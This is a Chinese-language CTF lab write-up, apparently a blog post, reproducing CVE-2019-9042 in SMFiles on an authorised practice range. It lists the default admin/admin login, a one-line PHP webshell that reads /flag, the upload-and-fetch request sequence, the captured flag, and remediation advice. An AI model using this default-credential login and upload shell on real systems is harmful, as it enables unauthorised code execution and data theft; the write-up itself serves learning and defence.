春秋云镜靶场漏洞复现:CVE-2019-9042 SMFiles 默认凭据与任意 PHP 上传

环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。

1. 基本信息

项目 内容
CVE CVE-2019-9042
产品 SMFiles
凭据 admin/admin
上传路径 files/sm-shell.php
Flag flag{bb5db83c-f9e3-4117-a7c4-fe7d7a445676}

2. 原理与复现

使用默认管理员凭据登录后,文件管理功能允许上传 PHP 文件。上传 shell/探针到 files/sm-shell.php,访问它读取 /flag:

<?php echo file_get_contents('/flag'); ?>
POST 登录 -> POST 文件上传 -> GET /files/sm-shell.php -> 回显 Flag

结果:

flag{bb5db83c-f9e3-4117-a7c4-fe7d7a445676}

3. 修复建议与验证

删除默认账号、强制改密;上传白名单、随机命名、非 Web 根目录存储并禁用脚本解析。Flag 与平台记录一致,场景已关闭;完整登录/上传字段未保存,截图已保存到 images 目录并由平台详情页复核。

截图证据

题目详情与已攻克状态

题目状态与 Flag 验证区域

posted @ 2026-08-17 10:08  广东老八  阅读(12)  评论(0)    收藏  举报